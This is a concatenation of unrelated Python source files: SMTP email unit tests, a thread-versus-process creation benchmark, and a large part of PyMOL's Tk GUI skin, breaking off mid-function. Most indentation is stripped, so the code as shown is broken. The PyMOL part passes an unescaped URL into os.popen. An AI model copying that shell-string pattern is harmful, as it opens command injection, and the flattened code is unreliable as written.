self.assertEqual(configuration.conf.get('smtp', 'SMTP_MAIL_FROM'), msg['From'])
self.assertEqual(2, len(msg.get_payload()))
self.assertEqual(u'attachment; filename="' + os.path.basename(attachment.name) + '"',
msg.get_payload()[-1].get(u'Content-Disposition'))
mimeapp = MIMEApplication('attachment')
self.assertEqual(mimeapp.get_payload(), msg.get_payload()[-1].get_payload())
@mock.patch('smtplib.SMTP_SSL')
@mock.patch('smtplib.SMTP')
def test_send_mime(self, mock_smtp, mock_smtp_ssl):
mock_smtp.return_value = mock.Mock()
mock_smtp_ssl.return_value = mock.Mock()
msg = MIMEMultipart()
utils.email.send_MIME_email('from', 'to', msg, dryrun=False)
mock_smtp.assert_called_with(
configuration.conf.get('smtp', 'SMTP_HOST'),
configuration.conf.getint('smtp', 'SMTP_PORT'),
)
self.assertTrue(mock_smtp.return_value.starttls.called)
mock_smtp.return_value.login.assert_called_with(
configuration.conf.get('smtp', 'SMTP_USER'),
configuration.conf.get('smtp', 'SMTP_PASSWORD'),
)
mock_smtp.return_value.sendmail.assert_called_with('from', 'to', msg.as_string())
self.assertTrue(mock_smtp.return_value.quit.called)
@mock.patch('smtplib.SMTP_SSL')
@mock.patch('smtplib.SMTP')
def test_send_mime_ssl(self, mock_smtp, mock_smtp_ssl):
configuration.conf.set('smtp', 'SMTP_SSL', 'True')
mock_smtp.return_value = mock.Mock()
mock_smtp_ssl.return_value = mock.Mock()
utils.email.send_MIME_email('from', 'to', MIMEMultipart(), dryrun=False)
self.assertFalse(mock_smtp.called)
mock_smtp_ssl.assert_called_with(
configuration.conf.get('smtp', 'SMTP_HOST'),
configuration.conf.getint('smtp', 'SMTP_PORT'),
)
@mock.patch('smtplib.SMTP_SSL')
@mock.patch('smtplib.SMTP')
def test_send_mime_noauth(self, mock_smtp, mock_smtp_ssl):
configuration.conf.remove_option('smtp', 'SMTP_USER')
configuration.conf.remove_option('smtp', 'SMTP_PASSWORD')
mock_smtp.return_value = mock.Mock()
mock_smtp_ssl.return_value = mock.Mock()
utils.email.send_MIME_email('from', 'to', MIMEMultipart(), dryrun=False)
self.assertFalse(mock_smtp_ssl.called)
mock_smtp.assert_called_with(
configuration.conf.get('smtp', 'SMTP_HOST'),
configuration.conf.getint('smtp', 'SMTP_PORT'),
)
        self.assertFalse(mock_smtp.return_value.login.called)
@mock.patch('smtplib.SMTP_SSL')
@mock.patch('smtplib.SMTP')
def test_send_mime_dryrun(self, mock_smtp, mock_smtp_ssl):
utils.email.send_MIME_email('from', 'to', MIMEMultipart(), dryrun=True)
self.assertFalse(mock_smtp.called)
self.assertFalse(mock_smtp_ssl.called)
if __name__ == '__main__':
unittest.main()
|
forkVsCreate.py
|
import threading
from multiprocessing import Process
import time
import os
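# Rough micro-benchmark: start 10 threads and 10 processes whose target simply
# sleeps for two seconds (the same worker function is reused for both despite its
# name), and compare how long creation plus start() takes for each. The join()
# calls fall outside the timed windows, so only creation/start overhead is measured.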
def MyThread():
time.sleep(2)
t0 = time.time()
threads = []
for i in range(10):
thread = threading.Thread(target=MyThread)
thread.start()
threads.append(thread)
t1 = time.time()
print("Total Time for Creating 10 Threads: {} seconds".format(t1-t0))
for thread in threads:
thread.join()
t2 = time.time()
procs = []
for i in range(10):
process = Process(target=MyThread)
process.start()
procs.append(process)
t3 = time.time()
print("Total Time for Creating 10 Processes: {} seconds".format(t3-t2))
for proc in procs:
proc.join()
|
__init__.py
|
from __future__ import print_function
import sys
import re
import threading
import os
import time
if sys.version_info[0] == 2:
from Tkinter import *
import tkFileDialog
import tkMessageBox
import tkFont
_next_method_name = 'next'
else:
from tkinter import *
import tkinter.filedialog as tkFileDialog
import tkinter.messagebox as tkMessageBox
import tkinter.font as tkFont
_next_method_name = '__next__'
import Pmw
from pymol.wizard import cleanup
from pmg_tk.Setting import Setting
from pmg_tk.SetEditor import SetEditor
from pmg_tk.ColorEditor import ColorEditor
from pmg_tk.skins import PMGSkin
from .builder import Builder
import traceback
root = None
def encode(s):
    '''If `s` is unicode, attempt to encode it. On failure, return the
    unicode input.
Our C file I/O implementations can't handle unicode. For some file
types we support reading the file in Python (supports unicode) and
passing the content to the underlying C routine.
'''
if sys.version_info[0] >= 3:
return s
if not isinstance(s, bytes):
for enc in [sys.getfilesystemencoding(), 'latin1']:
try:
e = s.encode(enc)
if os.path.exists(e):
return e
except UnicodeEncodeError:
pass
return s
def split_tk_file_list(pattern):
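    # Tk may hand back a multiple-file selection as a single Tcl-style list
    # string in which names containing spaces are wrapped in {braces}, e.g.
    # '{my file.pdb} other.pdb' -> ['my file.pdb', 'other.pdb'].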
filenames = []
while True:
pattern = pattern.strip()
if not pattern:
break
sep = None
if pattern[0] == '{':
pattern = pattern[1:]
sep = '}'
a = pattern.split(sep, 1)
filenames.append(a[0])
pattern = a[1] if len(a) == 2 else ''
return filenames
def asksaveasfilename(*args, **kwargs):
filename = tkFileDialog.asksaveasfilename(*args, **kwargs)
return encode(filename)
def askopenfilename(*args, **kwargs):
filename = tkFileDialog.askopenfilename(*args, **kwargs)
if not filename:
return filename
multiple = kwargs.get('multiple', 0)
if not multiple:
filename = [filename]
elif not isinstance(filename, (list, tuple)):
filename = split_tk_file_list(filename)
filename = map(os.path.normpath, filename)
filename = map(encode, filename)
filename = list(filename)
if not multiple:
return filename[0]
return filename
def _darwin_browser_open(url):
os.popen("open "+url,'r').read()
def darwin_browser_open(url):
t = threading.Thread(target=_darwin_browser_open,args=(url,))
t.setDaemon(1)
t.start()
def _doAsync(self_cmd,cmmd,dirty=0):
self_cmd.do(cmmd) # force strict ordering of commands
if dirty:
self_cmd.dirty()
def _def_ext(ext): # platform-specific default extension handling
if sys.platform != 'win32':
ext = None # default extensions don't work right under X11/Tcl/Tk
return ext
## class askfileopenfilter(askopenfilename):
## """
## Subclasses open file dialog to include filename filtering
## """
## def __init__(self, initialdir = initdir, filetypes=ftypes, multiple=1):
## super(askfileopen, self).__init__( initialdir, filetypes, multiple=multiple)
class Normal(PMGSkin):
pad = ' ' # extra space in menus
appname = 'The PyMOL Molecular Graphics System'
appversion = '0.0.0.0' # will be set in __init__
copyright = ('Copyright (C) 2003-%d\n' % (time.localtime().tm_year,) +
'Schrodinger LLC.\n'+
'All rights reserved.')
contactweb = 'http://www.pymol.org'
contactemail = '[email protected]'
# responsible for setup and takedown of the normal skin
def _inc_fontsize(self, delta, font):
size = font.cget('size')
sign = -1 if size < 0 else 1
size = max(5, abs(size) + delta)
font.configure(size=size * sign)
def inc_fontsize(self, delta=1):
for name in tkFont.names():
self._inc_fontsize(delta, tkFont.nametofont(name))
def inc_fontsize_dialog(self):
dialog = Toplevel(self.root)
grid = dialog
kw = {'row': 0, 'sticky': 'w', 'padx': 5, 'pady': 5}
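        # col() hands out successive grid column indices; _next_method_name is the
        # iterator method name for Python 2 ('next') vs Python 3 ('__next__')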
col = getattr(iter(range(5)), _next_method_name)
Button(grid, text=' - ', command=lambda: self.inc_fontsize(-1)).grid(column=col(), **kw)
Button(grid, text=' + ', command=lambda: self.inc_fontsize( 1)).grid(column=col(), **kw)
Label(grid, text='All GUI Font Sizes').grid(column=col(), **kw)
kw['row'] = 1
col = getattr(iter(range(5)), _next_method_name)
Button(grid, text=' - ', command=lambda: self._inc_fontsize(-1, self.fixedfont)).grid(column=col(), **kw)
Button(grid, text=' + ', command=lambda: self._inc_fontsize( 1, self.fixedfont)).grid(column=col(), **kw)
Label(grid, text='Output Font Size').grid(column=col(), **kw)
dialog.title('GUI Font Size')
@property
def initialdir(self):
'''
Be in sync with cd/pwd on the console until the first file has been
browsed, then remember the last directory.
'''
return self._initialdir or os.getcwd()
@initialdir.setter
def initialdir(self, value):
self._initialdir = value
def cd_dialog(self):
self.cmd.cd(encode(tkFileDialog.askdirectory(
title="Change Working Directory",
initialdir=self.initialdir)) or '.', quiet=0)
def complete(self,event):
st = self.cmd._parser.complete(self.command.get())
if st:
self.command.set(st)
self.entry.icursor(len(st))
return 'break'
def createDataArea(self):
# Create data area where data entry widgets are placed.
self.dataArea = self.app.createcomponent('dataarea',
(), None,
Frame, (self.app._hull,),
relief=SUNKEN,
bd=1)
self.dataArea.pack(side=LEFT, fill=BOTH, expand=YES,
padx=1, pady=1)
def destroyDataArea(self):
self.app.destroycomponent('dataarea')
def createCommandArea(self):
# Create a command area for application-wide buttons.
self.commandFrame = self.app.createcomponent('commandframe', (), None,
Frame,(self.app._hull,),relief=SUNKEN,bd=1)
self.commandFrame.place(width=500)
self.commandFrame.pack(side=TOP,
expand=NO,
fill=BOTH,
padx=1,
pady=1)
def destroyCommandArea(self):
self.app.destroycomponent('commandframe')
def createMessageBar(self):
self.messageBar = Pmw.MessageBar(self.commandFrame, entry_width = 25,
entry_relief='sunken', entry_borderwidth=1) #, labelpos = 'w')
self.abortButton=Button(self.commandFrame,
text='Rebuild',highlightthickness=0,
# state=DISABLED,
command=lambda s=self:self.rebuild(),padx=0,pady=0)
self.abortButton.pack(side=RIGHT,fill=BOTH,expand=YES)
self.messageBar.pack(side=BOTTOM, anchor=W, fill=X, expand=1)
self.balloon.configure(statuscommand = self.messageBar.helpmessage)
def destroyMessageBar(self):
self.messageBar.destroy()
def get_current_session_file(self):
session_file = self.cmd.get_setting_text("session_file")
session_file = session_file.replace("\\","/") # always use unix-like path separators
return session_file
def set_current_session_file(self, session_file):
session_file = session_file.replace("\\","/") # always use unix-like path separators
self.cmd.set("session_file",session_file)
def confirm_quit(self,e=None):
if self.cmd.get_setting_boolean("session_changed"):
session_file = self.get_current_session_file()
if session_file != '':
message = "Save the current session '%s'?"%os.path.split(session_file)[1]
else:
message = "Save the current session?"
check = tkMessageBox._show("Save Session", message,
tkMessageBox.QUESTION, tkMessageBox.YESNOCANCEL)
if check==tkMessageBox.YES:
if self.session_save():
self.quit_app()
elif check==tkMessageBox.NO:
self.quit_app()
else:
self.quit_app()
def quit_app(self):
self.cmd.log_close()
self.cmd.quit() # avoid logging this - it is inconvenient...
def buttonAdd(self,frame,text,cmmd):
newBtn=Button(frame,
text=text,highlightthickness=0,
command=cmmd,padx=0,pady=0)
newBtn.pack(side=LEFT,fill=BOTH,expand=YES)
return newBtn
def get_view(self):
self.cmd.get_view(2, quiet=0)
try:
            view_str = self.cmd.get_view(3,quiet=1)
            self.root.clipboard_clear()
            self.root.clipboard_append(view_str)
            self.last_view = view_str
self.app.selection_clear()
self.app.selection_own()
self.app.selection_handle(lambda a,b,s=self:s.last_view)
print(" PyMOL: Viewing matrix copied to clipboard.")
        except Exception:
traceback.print_exc()
def createButtons(self):
self.buttonArea = Frame(self.root)
self.buttonArea.pack(side=TOP, anchor=W)
row1 = self.app.createcomponent('row1', (), None,
Frame,self.commandFrame,bd=0)
row1.pack(side=TOP,fill=BOTH,expand=YES)
btn_reset = self.buttonAdd(row1,'Reset',lambda s=self: s.cmd.do("_ reset"))
btn_reset = self.buttonAdd(row1,'Zoom',lambda s=self: s.cmd.do("_ zoom animate=-1"))
btn_orient = self.buttonAdd(row1,'Orient',lambda s=self: s.cmd.do("_ orient animate=1"))
btn_rtrace = self.buttonAdd(row1,'Draw',lambda s=self: s.cmd.do("_ draw"))
btn_rtrace = self.buttonAdd(row1,'Ray',lambda s=self: s.cmd.do("_ ray async=1"))
row2 = self.app.createcomponent('row2', (), None,
Frame,self.commandFrame,bd=0)
row2.pack(side=TOP,fill=BOTH,expand=YES)
btn_unpick = self.buttonAdd(row2,'Unpick',lambda s=self: s.cmd.do("_ unpick"))
btn_hidesele = self.buttonAdd(row2,'Deselect', lambda: self.cmd.do("_ deselect"))
btn_reset = self.buttonAdd(row2,'Rock',lambda s=self: s.cmd.do("_ rock"))
btn_getview = self.buttonAdd(row2,'Get View',lambda s=self: s.get_view()) # doesn't get logged
row3 = self.app.createcomponent('row3', (), None,
Frame,self.commandFrame,bd=0)
row3.pack(side=TOP,fill=BOTH,expand=YES)
btn_rewind = self.buttonAdd(row3,'|<',lambda s=self: s.cmd.do("_ rewind"))
btn_back = self.buttonAdd(row3,'<',lambda s=self: s.cmd.do("_ backward"))
btn_stop = self.buttonAdd(row3,'Stop',lambda s=self: s.cmd.do("_ mstop"))
btn_play = self.buttonAdd(row3,'Play',lambda s=self: s.cmd.do("_ mplay"))
btn_forward = self.buttonAdd(row3,'>',lambda s=self: s.cmd.do("_ forward"))
btn_last = self.buttonAdd(row3,'>|',lambda s=self: s.cmd.do("_ ending"))
btn_ccache = self.buttonAdd(row3,'MClear',lambda s=self: s.cmd.do("_ mclear"))
row4 = self.app.createcomponent('row4', (), None,
Frame,self.commandFrame,bd=0)
row4.pack(side=TOP,fill=BOTH,expand=YES)
self.cmdB = self.buttonAdd(row4,'Command',
lambda s=self:
s.toggleFrame(s.cmdFrame))
self.buildB = self.buttonAdd(row4,'Builder',
lambda s=self:
s.toggleFrame(s.buildFrame))
self.volB = self.buttonAdd(row4, 'Volume',
self.newVolumeFrame)
# initialize disabled
self.volB.config(state=DISABLED)
def newVolumeFrame(self):
volumes = self.cmd.get_names_of_type("object:volume", public=1)
if not volumes:
return
if len(volumes) == 1:
self.cmd.volume_panel(volumes[0])
return
def callback():
sels = listbox.getcurselection()
if sels:
self.cmd.volume_panel(sels[0])
window.destroy()
title = 'Select a volume object'
window = Toplevel(self.app.root)
window.title(title)
listbox = Pmw.ScrolledListBox(window,
labelpos='nw',
label_text=title,
items=volumes,
selectioncommand=callback)
listbox.pack(padx=5, pady=5)
x, y = window.winfo_pointerxy()
window.geometry('+%d+%d' % (x - 20, y - 20))
def destroyButtonArea(self):
self.app.destroycomponent('row1')
self.app.destroycomponent('row2')
self.app.destroycomponent('row3')
self.app.destroycomponent('row4')
self.buttonArea.destroy()
def my_show(self,win,center=1):
if sys.platform!='linux2':
win.show()
else: # autocenter, deiconify, and run mainloop
# this is a workaround for a bug in the
# interaction between Tcl/Tk and common Linux
# window managers (namely KDE/Gnome) which causes
# an annoying 1-2 second delay in opening windows!
if center:
tw = win.winfo_reqwidth()+100
th = win.winfo_reqheight()+100
vw = win.winfo_vrootwidth()
vh = win.winfo_vrootheight()
x = max(0,(vw-tw)/2)
y = max(0,(vh-th)/2)
win.geometry(newGeometry="+%d+%d"%(x,y))
win.deiconify()
# win.show()
def my_withdraw(self,win):
if sys.platform!='linux2':
win.withdraw()
else:
win.destroy()
def my_activate(self,win,center=1,focus=None):
if sys.platform!='linux2':
win.activate()
else: # autocenter, deiconify, and run mainloop
# this is a workaround for a bug in the
# interaction between Tcl/Tk and common Linux
# window managers (namely KDE/Gnome) which causes
# an annoying 1-2 second delay in opening windows!
if center:
tw = win.winfo_reqwidth()+100
th = win.winfo_reqheight()+100
vw = win.winfo_vrootwidth()
vh = win.winfo_vrootheight()
x = max(0,(vw-tw)/2)
                y = max(0,(vh-th)/2)
win.geometry(newGeometry="+%d+%d"%(x,y))
win.deiconify()
if focus!=None:
focus.focus_set()
win.mainloop()
def my_deactivate(self,win):
if sys.platform!='linux2':
win.deactivate()
else: # autocenter, deiconify, and run mainloop
win.destroy()
def back_search(self, set0=False):
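        # Bound to <Control-Up>: search older history entries for the most recent
        # one that starts with the prefix currently typed (kept in history[0]).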
if not self.history_cur or set0:
self.history[0] = self.command.get()
for i in range(self.history_cur + 1, len(self.history)):
if self.history[i].startswith(self.history[0]):
self.history_cur = i
self.command.set(self.history[self.history_cur])
l = len(self.history[self.history_cur])
self.entry.icursor(l)
break
def back(self):
if not self.history_cur:
self.history[0] = self.command.get()
self.history_cur = (self.history_cur + 1) & self.history_mask
self.command.set(self.history[self.history_cur])
l = len(self.history[self.history_cur])
self.entry.icursor(l)
def forward(self):
if not self.history_cur:
self.history[0] = self.command.get()
self.history_cur = max(0, self.history_cur - 1) & self.history_mask
self.command.set(self.history[self.history_cur])
l = len(self.history[self.history_cur])
self.entry.icursor(l)
def doAsync(self,cmmd):
t = threading.Thread(target=_doAsync,args=(self.cmd,cmmd))
t.setDaemon(1)
t.start()
def doTypedCommand(self,cmmd):
if self.history[1] != cmmd:
self.history[0]=cmmd
self.history.insert(0,'') # always leave blank at 0
self.history.pop(self.history_mask+1)
self.history_cur = 0
t = threading.Thread(target=_doAsync,args=(self.cmd,cmmd,1))
t.setDaemon(1)
t.start()
def dump(self,event):
print(dir(event))
print(event.keysym, event.keycode)
def createConsole(self):
self.command = StringVar()
self.lineCount = 0
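        # The command history is a fixed-size ring of history_mask+1 (256) slots;
        # slot 0 always holds the line currently being edited, and back()/forward()
        # walk the ring by masking the index.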
self.history_mask = 0xFF
self.history = [''] * (self.history_mask+1)
self.history_cur = 0
self.cmdFrame = Frame(self.dataArea)
self.buildFrame = Builder(self.app, self.dataArea)
self.toggleFrame(self.cmdFrame,startup=1)
self.entryFrame = Frame(self.cmdFrame)
self.entryFrame.pack(side=BOTTOM,expand=NO,fill=X)
self.entry_label = Label(self.entryFrame, text="PyMOL>", padx=1, pady=1, justify=RIGHT)
self.entry_label.pack(side=LEFT,expand=NO,fill=X)
self.entry = Entry(self.entryFrame, justify=LEFT, width=70,
textvariable=self.command)
self.entry.pack(side=LEFT,expand=YES,fill=X)
self.output = Pmw.ScrolledText(self.cmdFrame)
self.output.pack(side=TOP, fill=BOTH, expand=YES)
self.entry.bind('<Return>', lambda e, s=self:
(s.doTypedCommand(s.command.get()), s.command.set('')))
self.entry.bind('<Tab>', lambda e, s=self: s.complete(e))
self.entry.bind('<Up>', lambda e, s=self: s.back())
self.entry.bind('<Down>', lambda e, s=self: s.forward())
self.entry.bind('<Control-Up>', lambda e: self.back_search())
self.root.protocol("WM_DELETE_WINDOW", lambda s=self: s.confirm_quit())
self.log_file = "log.pml"
# self.entry = self.app.createcomponent('entry', (), None,
# Entry,
# (self.dataArea,),
# justify=LEFT,
# width=50,
### textvariable=self.command)
text = self.output.component('text')
self.text = text
if sys.platform.startswith('win'):
self.font = 'lucida console' # only available on windows
self.my_fw_font=(self.font,8)
self.fixedfont.configure(family=self.font, size=self.my_fw_font[1])
else:
text.tk.call('tk','scaling',1)
self.font = 'fixed' # should be available on any X11-based platform
self.my_fw_font=(self.font,10)
if sys.platform == 'darwin':
self.fixedfont.configure(size=11)
text.configure(width=74)
self.balloon.bind(self.entry, '''Command Input Area
Get the list of commands by hitting <TAB>
Get the list of arguments for one command with a question mark:
PyMOL> color ?
Read the online help for a command with "help":
PyMOL> help color
Get autocompletion for many arguments by hitting <TAB>
PyMOL> color ye<TAB> (will autocomplete "yellow")
''')
if self.app.allow_after:
self.output.after(100,self.update_feedback)
self.output.after(100,self.update_menus)
self.output.pack(side=BOTTOM,expand=YES,fill=BOTH)
self.app.bind(self.entry, 'Command Input Area')
self.app.bind_all('<F1>',lambda e,s=self: s.cmd.do("cmd._special(1,0,0)"))
self.app.bind_all('<F2>',lambda e,s=self: s.cmd.do("cmd._special(2,0,0)"))
self.app.bind_all('<F3>',lambda e,s=self: s.cmd.do("cmd._special(3,0,0)"))
self.app.bind_all('<F4>',lambda e,s=self: s.cmd.do("cmd._special(4,0,0)"))
self.app.bind_all('<F5>',lambda e,s=self: s.cmd.do("cmd._special(5,0,0)"))
self.app.bind_all('<F6>',lambda e,s=self: s.cmd.do("cmd._special(6,0,0)"))
self.app.bind_all('<F7>',lambda e,s=self: s.cmd.do("cmd._special(7,0,0)"))
self.app.bind_all('<F8>',lambda e,s=self: s.cmd.do("cmd._special(8,0,0)"))
self.app.bind_all('<F9>',lambda e,s=self: s.cmd.do("cmd._special(9,0,0)"))
self.app.bind_all('<F10>',lambda e,s=self: s.cmd.do("cmd._special(10,0,0)"))
self.app.bind_all('<F11>',lambda e,s=self: s.cmd.do("cmd._special(11,0,0)"))
self.app.bind_all('<F12>',lambda e,s=self: s.cmd.do("cmd._special(12,0,0)"))
self.app.bind_all('<Control-F1>',lambda e,s=self: s.cmd.do("cmd._special(1,0,0,2)"))
self.app.bind_all('<Control-F2>',lambda e,s=self: s.cmd.do("cmd._special(2,0,0,2)"))
self.app.bind_all('<Control-F3>',lambda e,s=self: s.cmd.do("cmd._special(3,0,0,2)"))
self.app.bind_all('<Control-F4>',lambda e,s=self: s.cmd.do("cmd._special(4,0,0,2)"))
self.app.bind_all('<Control-F5>',lambda e,s=self: s.cmd.do("cmd._special(5,0,0,2)"))
self.app.bind_all('<Control-F6>',lambda e,s=self: s.cmd.do("cmd._special(6,0,0,2)"))
self.app.bind_all('<Control-F7>',lambda e,s=self: s.cmd.do("cmd._special(7,0,0,2)"))
self.app.bind_all('<Control-F8>',lambda e,s=self: s.cmd.do("cmd._special(8,0,0,2)"))
self.app.bind_all('<Control-F9>',lambda e,s=self: s.cmd.do("cmd._special(9,0,0,2)"))
self.app.bind_all('<Control-F10>',lambda e,s=self: s.cmd.do("cmd._special(10,0,0,2)"))
self.app.bind_all('<Control-F11>',lambda e,s=self: s.cmd.do("cmd._special(11,0,0,2)"))
self.app.bind_all('<Control-F12>',lambda e,s=self: s.cmd.do("cmd._special(12,0,0,2)"))
self.entry.bind('<Prior>',lambda e,s=self: s.cmd.do("cmd._special(104,0,0)"))
self.entry.bind('<Next>',lambda e,s=self: s.cmd.do("cmd._special(105,0,0)"))
self.entry.bind('<Control-Prior>',lambda e,s=self: s.cmd.do("cmd._special(104,0,0,2)"))
self.entry.bind('<Control-Next>',lambda e,s=self: s.cmd.do("cmd._special(105,0,0,2)"))
self.entry.bind('<Home>',lambda e,s=self: s.cmd.do("cmd._special(106,0,0)"))
self.entry.bind('<End>',lambda e,s=self: s.cmd.do("cmd._special(107,0,0)"))
def update_feedback(self):
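        """Poll PyMOL for buffered feedback and progress, append it to the output (trimming back to ~5000 lines once it exceeds 10000), and reschedule: every 10 ms while PyMOL is busy, otherwise every 100 ms."""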
feedback = self.cmd._get_feedback(self.cmd)
if feedback!=None:
self.text.configure(state='normal')
for a in feedback:
self.output.insert(END,"\n")
self.output.insert(END,a)
self.output.see(END)
self.lineCount = self.lineCount + 1
if self.lineCount > 10000:
self.output.delete('0.0','%i.%i' % (self.lineCount-5000,0))
self.lineCount=5000
self.text.configure(state='disabled')
progress = self.cmd.get_progress()
if progress>=0.0:
# self.abortButton.config(state=NORMAL)
self.messageBar.message("busy","Progress %d%%..."%int(progress*100))
else:
# self.abortButton.config(state=DISABLED)
self.messageBar.resetmessages("busy")
if self.app.allow_after:
if feedback == None: # PyMOL busy, so try more aggressively to get lock
self.output.after(10,self.update_feedback) # 100X a second
else:
self.output.after(100,self.update_feedback) # 10X a second
def abort(self):
self.cmd.interrupt()
# self.abortButton.config(state=DISABLED)
def rebuild(self):
self.doAsync("_ rebuild")
def toggleFrame(self, frame, startup=0):
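        """Swap the given frame into the data area (or back to the command frame); entering the Builder switches PyMOL to editing mode and temporarily overrides valence and auto_overlay, restoring them when leaving."""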
if frame not in self.dataArea.slaves():
# clear all frames in dataArea
for f in self.dataArea.slaves():
f.pack_forget()
# add requested frame to data area
frame.pack(side=BOTTOM, fill=BOTH, expand=YES)
else:
# clear frame from data area
if frame != self.cmdFrame:
frame.pack_forget()
# next command will cause command frame to be turned on if
# nothing else is visible... might not want this behavior
self.cmdFrame.pack(side=BOTTOM, fill=BOTH, expand=YES)
frame = self.cmdFrame
if not startup:
if frame == self.cmdFrame:
if self.edit_mode != None:
self.cmd.edit_mode(self.edit_mode)
self.edit_mode = None
if self.auto_overlay != None:
self.cmd.set("auto_overlay",self.auto_overlay)
self.auto_overlay = None
if self.valence != None:
self.cmd.set("valence",self.valence)
elif frame == self.buildFrame:
frame.deferred_activate()
if "Editing" not in self.cmd.get("button_mode_name"):
self.cmd.edit_mode(1)
self.edit_mode = 0
self.valence = self.cmd.get("valence")
self.cmd.set("valence","1")
self.auto_overlay = self.cmd.get("auto_overlay")
self.cmd.set("auto_overlay",1)
def update_menus(self):
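        """Refresh the settings menus and enable the Volume button only when volume objects exist; reschedules itself every 500 ms."""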
self.setting.refresh()
if True:
# volume frame is closed, update the button
if len(self.cmd.get_names_of_type("object:volume",public=1))>0:
self.volB.config(state=NORMAL)
else:
self.volB.config(state=DISABLED)
# keep calling
if self.app.allow_after:
self.output.after(500,self.update_menus) # twice a second
def file_open(self,tutorial=0):
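        """Ask for one or more structure files (or tutorial data) and load them; opening a different .pse clears the remembered session filename."""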
if not tutorial:
initdir = self.initialdir
ftypes = self.app.getLoadableFileTypes()
else:
initdir = os.environ['TUT']
# only list file extensions that are used for tutorial data
ftypes = [("Tutorial Data","*.pdb"),]
if TkVersion>8.3:
ofile_list = askopenfilename(initialdir = initdir,
filetypes=ftypes,
multiple=1) # new option in Tk 8.4
else:
ofile_list = [ askopenfilename(initialdir = initdir,
filetypes=ftypes) ]
for ofile in ofile_list:
if len(ofile):
if not tutorial:
self.initialdir = os.path.dirname(ofile)
if ofile[-4:].lower() == '.pse' and ofile != self.save_file:
self.save_file = '' # remove ambiguous default
self.cmd.do('_ /cmd.load(%s, quiet=0)' % repr(ofile))
def log_open(self):
sfile = asksaveasfilename(initialfile = self.log_file,
initialdir = self.initialdir,
filetypes=[
("PyMOL Script","*.pml"),
("PyMOL Program","*.pym"),
("Python Program","*.py"),
("All Files","*.*"),
("All Files","*"),
])
if len(sfile):
self.initialdir = os.path.dirname(sfile)
self.log_file = os.path.basename(sfile)
self.cmd.log_open(sfile)
def log_resume(self,append_only=0):
ofile = askopenfilename(initialdir = os.getcwd(),
filetypes=[("All Resumable","*.pml"),
("All Resumable","*.pym"),
("All Resumable","*.py"),
("PyMOL Script","*.pml"),
("PyMOL Program","*.pym"),
("Python Program","*.py"),
("All Files","*.*"),
("All Files","*"),
])
if len(ofile):
self.initialdir = os.path.dirname(ofile)
self.log_file = os.path.basename(ofile)
# os.chdir(self.initialdir)
self.cmd.resume(ofile)
def log_append(self,append_only=0):
ofile = askopenfilename(initialdir = os.getcwd(),
filetypes=[("All Appendable","*.pml"),
("All Appendable","*.pym"),
("All Appendable","*.py"),
("PyMOL Script","*.pml"),
("PyMOL Program","*.pym"),
("Python Program","*.py"),
("All Files","*.*"),
("All Files","*"),
])
if len(ofile):
self.initialdir = os.path.dirname(ofile)
self.log_file = os.path.basename(ofile)
# os.chdir(self.initialdir)
self.cmd.log_open(ofile,'a')
def session_save(self):
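        """Save the session to the current session file, or fall back to Save As if none is set; the save runs via cmd.do so it executes on the main thread and blocks quit."""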
self.save_file = self.get_current_session_file()
if self.save_file!='':
self.cmd.log("save %s,format=pse\n"%(self.save_file),
"cmd.save('%s',format='pse')\n"%(self.save_file))
# self.cmd.save(self.save_file,"","pse",quiet=0)
# self.cmd.set("session_changed",0)
self.cmd.do("_ cmd.save('''%s''','','pse',quiet=0)"%self.save_file) # do this in the main thread to block cmd.quit, etc.
self.cmd.do("_ cmd.set('session_changed',0)")
return 1
else:
return self.session_save_as()
def session_save_as(self):
(self.initialdir, self.save_file) = os.path.split(self.get_current_session_file())
(save_file, def_ext) = os.path.splitext(self.save_file)
sfile = asksaveasfilename(defaultextension = _def_ext(def_ext),
initialfile = save_file,
initialdir = self.initialdir,
filetypes=[
("PyMOL Session File","*.pse"),
("PyMOL Show File","*.psw"),
])
if len(sfile):
if re.search(r"\.pse$|\.PSE$|\.psw$|\.PSW$",sfile)==None:
sfile=sfile+".pse"
self.initialdir = os.path.dirname(sfile)
self.cmd.log("save %s,format=pse\n"%(sfile),
"cmd.save('%s',format='pse')\n"%(sfile))
# self.cmd.save(sfile,"",format='pse',quiet=0)
# self.cmd.set("session_changed",0)
self.save_file = sfile
# self.cmd.set("session_file",self.save_file)
self.set_current_session_file(self.save_file)
# do this in the main thread to block cmd.quit, etc.
self.cmd.do("_ cmd.save('''%s''','','pse',quiet=0)"%self.save_file)
self.cmd.do("_ cmd.set('session_changed',0)")
return 1
else:
return 0
def file_save(self):
"""
File->Save Molecule, now with filtering
"""
def command(result):
if result == 'OK':
self.file_save2(
dialog.getcurselection(),
multiple_files_option.getvalue(),
states_option.getvalue())
self.my_withdraw(dialog)
def update_save_listbox():
lst = self.cmd.get_names('public')
searchstr = filter_entry.getvalue()
if searchstr:
lst = [x for x in lst if searchstr in x]
dialog.component("scrolledlist").setlist(lst)
dialog = Pmw.SelectionDialog(self.root,
title="Save",
buttons = ('OK', 'Cancel'),
defaultbutton='OK',
scrolledlist_labelpos=N,
scrolledlist_listbox_selectmode=EXTENDED,
label_text='Which object or selection would you like to save?',
scrolledlist_items = (), # used to be 'lst'
command = command)
filter_entry = Pmw.EntryField(dialog.interior(),
labelpos='w',
modifiedcommand=update_save_listbox,
validate=None,
value="",
label_text="Filter:")
filter_entry.pack(pady=6, fill='x', expand=0, padx=10)
multiple_files_option = Pmw.RadioSelect( dialog.interior(),
labelpos='w',
orient='vertical',
selectmode='single',
label_text="Save to...",
buttontype="radiobutton",
)
multiple_files_option.add("one file")
multiple_files_option.add("multiple files")
multiple_files_option.invoke("one file")
multiple_files_option.pack(side='left', pady=8)
states_option = Pmw.RadioSelect( dialog.interior(),
labelpos='w',
orient='vertical',
selectmode='single',
label_text='Saved state...',
buttontype="radiobutton"
)
states_option.add("all")
states_option.add("global")
states_option.add("object's current")
states_option.invoke("global")
states_option.pack(side='right', pady=8)
# The listbox is created empty. Fill it now.
update_save_listbox()
if len(dialog.component('scrolledlist').get()):
# set focus on the first item
listbox = dialog.component('scrolledlist')
listbox.selection_set(0)
self.my_show(dialog)
def file_save2(self, sels, multiple_files_flag, state_flag):
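        """Save the selected objects to one file or to one file per object, honoring the state mode ('all', 'global', or each object's current state); saving a single multi-state object with 'all' writes one file per state with a _stateNNN suffix."""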
filetypes_save = [
("PDB File","*.pdb"),
("MOL File","*.mol"),
("MOL2 File","*.mol2"),
("MMD File","*.mmd"),
("PKL File","*.pkl"),
("SDF File","*.sdf"),
("PDBx/mmCIF","*.cif"),
("PQR","*.pqr"),
("Maestro","*.mae"),
("XYZ","*.xyz"),
]
if True:
# save N>1 objects to ONE file
